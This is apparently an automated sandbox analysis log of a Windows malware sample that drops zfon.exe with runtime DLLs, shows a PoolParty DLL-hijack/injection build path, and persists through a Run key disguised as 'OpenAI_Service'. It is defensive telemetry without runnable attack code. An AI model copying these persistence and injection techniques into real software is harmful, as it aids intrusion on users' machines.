Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: down.lnk.11.drLNK file: ..\..\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: VJQyKuHEUe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: VJQyKuHEUe.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: VJQyKuHEUe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\buildworker\csgo_rel_win64\build\_build_\valve_wmf\_vpc_valve_wmf\default\win64\_msvc_\Retail\valve_wmf.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: zfon.exe, 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000006.00000002.2626243469.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001A.00000002.2826630254.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001B.00000002.2826626774.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001C.00000002.2983575039.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001D.00000002.2983573004.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001E.00000002.3573610429.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001F.00000002.3573612962.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000022.00000002.4202113973.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000023.00000002.4200959181.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: Binary string: C:\projects\hydra\main\Release_X64\sceneProd\sceneSourceCef.pdb source: zfon.exe, zfon.exe, 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: d:\agent\_work\2\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: zfon.exe, 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000006.00000002.2624943938.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001A.00000002.2822975181.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001B.00000002.2822877853.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001C.00000002.2982816689.00007FF8A8052000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001D.00000002.2982816052.00007FF8A8052000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001E.00000002.3573056415.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001F.00000002.3573084819.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000022.00000002.4198997991.00007FF8B8342000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000023.00000002.4198930072.00007FF8B8342000.00000002.00000001.01000000.0000000C.sdmp, MSVCP140.dll.0.dr
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdb source: zfon.exe, 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2604339396.000002DC4BEC5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdbC source: zfon.exe, 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2604339396.000002DC4BEC5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\code\personal\soft_distribute_tags\code\CSharpInstaller13\obj\Release\counterstand.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: zfon.exe, 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000006.00000002.2627113916.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001A.00000002.2827027498.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001B.00000002.2827030579.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001C.00000002.2983306377.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001D.00000002.2983300322.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001E.00000002.3573963734.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001F.00000002.3573968038.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000022.00000002.4204868510.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000023.00000002.4202524795.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: q8EC:\buildworker\csgo_rel_win64\build\_build_\valve_wmf\_vpc_valve_wmf\default\win64\_msvc_\Retail\valve_wmf.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: zfon.exe, 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000006.00000002.2627113916.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001A.00000002.2827027498.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001B.00000002.2827030579.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001C.00000002.2983306377.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001D.00000002.2983300322.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001E.00000002.3573963734.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001F.00000002.3573968038.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000022.00000002.4204868510.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000023.00000002.4202524795.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: zfon.exe, 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000006.00000002.2626243469.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001A.00000002.2826630254.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001B.00000002.2826626774.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001C.00000002.2983575039.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001D.00000002.2983573004.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001E.00000002.3573610429.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001F.00000002.3573612962.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000022.00000002.4202113973.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000023.00000002.4200959181.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr

Data Obfuscation

barindex
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeUnpacked PE file: 6.2.zfon.exe.7ff7f96e0000.0.unpack
Source: VJQyKuHEUe.exeStatic PE information: 0xD177A4E7 [Mon May 12 12:39:03 2081 UTC]
Source: VJQyKuHEUe.exeStatic PE information: real checksum: 0x32e39 should be: 0x388be
Source: zfon.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x293a39
Source: MSVCP140.dll.0.drStatic PE information: section name: .didat
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeCode function: 0_2_0275F0A2 pushad ; iretd 0_2_0275F0A9
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 6_2_000002DC4BE584DB push dword ptr [esp+eax-76h]; ret 6_2_000002DC4BE584E0
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB5B00CF pushad ; iretd 7_2_000001CDCB5B00D0
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB903D09 push eax; ret 7_2_000001CDCB903D0A
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB903D26 push eax; ret 7_2_000001CDCB903D27
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB903CA9 push eax; ret 7_2_000001CDCB903CAA
Source: C:\Windows\explorer.exeCode function: 11_2_0305005B push esi; retf 11_2_030500AD
Source: C:\Windows\explorer.exeCode function: 11_2_0305002D push esi; retf 11_2_030500AD
Source: C:\Windows\explorer.exeCode function: 11_2_030500AE push esi; retf 11_2_030500AD
Source: C:\Windows\explorer.exeCode function: 11_2_030500AE push esp; retf 11_2_030500B8
Source: C:\Windows\explorer.exeCode function: 11_2_08925876 push ds; retf 11_2_08925877
Source: C:\Windows\explorer.exeCode function: 11_2_08926172 push 8348FFFFh; ret 11_2_0892617A
Source: C:\Windows\explorer.exeCode function: 11_2_089277A1 push ebx; iretd 11_2_089277A6

Persistence and Installation Behavior

barindex
Source: C:\Windows\hh.exeFile created: C:\ProgramData\kernelquick.sysJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeFile created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\vcruntime140_1.dllJump to dropped file
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeFile created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\MSVCP140.dllJump to dropped file
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeFile created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.rawJump to dropped file
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeFile created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeJump to dropped file
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeFile created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeFile created: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.rawJump to dropped file
Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OpenAI_ServiceJump to behavior
Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OpenAI_ServiceJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B9116580 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00007FF8B9116580
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\hh.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE VenkernalData_infoJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VJQyKuHEUe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
